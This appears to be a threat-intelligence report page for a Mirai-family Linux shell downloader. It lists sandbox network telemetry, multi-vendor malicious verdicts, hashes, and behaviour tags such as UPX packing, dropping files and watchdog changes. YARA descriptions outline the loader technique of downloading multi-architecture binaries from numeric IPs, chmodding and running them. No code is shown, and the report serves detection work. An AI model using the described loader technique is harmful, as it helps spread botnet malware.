/tmp/m9x7k2v8b3.x86_64 net send-data zombie guuid=09771ceb-1c00-0000-f68c-9c0af3100000 pid=4339->guuid=855c2ceb-1c00-0000-f68c-9c0af5100000 pid=4341 clone guuid=855c2ceb-1c00-0000-f68c-9c0af5100000 pid=4341->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 975B guuid=855c2ceb-1c00-0000-f68c-9c0af5100000 pid=4341->310a0ed0-c544-54ca-bf3f-fca55e459297 send: 2B guuid=d72cba15-1e00-0000-f68c-9c0a2e140000 pid=5166->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 780B guuid=d72cba15-1e00-0000-f68c-9c0a2e140000 pid=5166->310a0ed0-c544-54ca-bf3f-fca55e459297 send: 2B guuid=a6ceea2a-1e00-0000-f68c-9c0a30140000 pid=5168->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 153B guuid=fb088034-1e00-0000-f68c-9c0a32140000 pid=5170->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 102B guuid=ed5b8a40-1e00-0000-f68c-9c0a49140000 pid=5193->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 152B guuid=2c470f44-1e00-0000-f68c-9c0a53140000 pid=5203->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 101B guuid=fab45e4c-1e00-0000-f68c-9c0a69140000 pid=5225->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 153B guuid=3d184751-1e00-0000-f68c-9c0a77140000 pid=5239->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 102B guuid=48eeed5d-1e00-0000-f68c-9c0aa3140000 pid=5283->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 153B guuid=d5b19062-1e00-0000-f68c-9c0aa4140000 pid=5284->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 102B guuid=608f7b6b-1e00-0000-f68c-9c0aae140000 pid=5294->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 153B guuid=1ba4d96f-1e00-0000-f68c-9c0ab5140000 pid=5301->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 102B guuid=f8df2176-1e00-0000-f68c-9c0aba140000 pid=5306->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 152B guuid=0051ad79-1e00-0000-f68c-9c0abb140000 pid=5307->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 101B guuid=c128797f-1e00-0000-f68c-9c0ac0140000 pid=5312->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 152B guuid=9426cd84-1e00-0000-f68c-9c0ac1140000 pid=5313->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 101B guuid=2f041a8c-1e00-0000-f68c-9c0ac6140000 pid=5318->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 153B guuid=1b65d890-1e00-0000-f68c-9c0ac7140000 pid=5319->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 102B guuid=b54b9598-1e00-0000-f68c-9c0acc140000 pid=5324->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 152B guuid=9aa2fc9d-1e00-0000-f68c-9c0acd140000 pid=5325->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 101B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2025-12-31 18:24:49 UTC
File Type:
Text (Shell)
AV detection:
15 of 24 (62.50%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=usz4dwezr2tnbwhfwjx5bbfgu6cvyjgcjxzkhl3c5t5pocqcdpea._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai antivm botnet defense_evasion discovery linux upx
Link:
https://tria.ge/reports/251231-x2zetads8b/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/a4b3c1d8998e/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders
Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8

(this sample)

Mirai

elf 40b4b8678687daf5daf25dff607144765a956de8b88757c3ce343165fece2dad

Mirai

elf a032e7a7053822b6d37f8dc47c093ee0ba09ca5b95ad8413f8511fb0cf9c8abd

  
URLhaus
https://urlhaus.abuse.ch/url/3747245/
  
Delivery method
Distributed via web download
  
Dropping
MD5 ae181b52beea891e03c5d55c15fd3945
  
Dropping
SHA256 a032e7a7053822b6d37f8dc47c093ee0ba09ca5b95ad8413f8511fb0cf9c8abd

Comments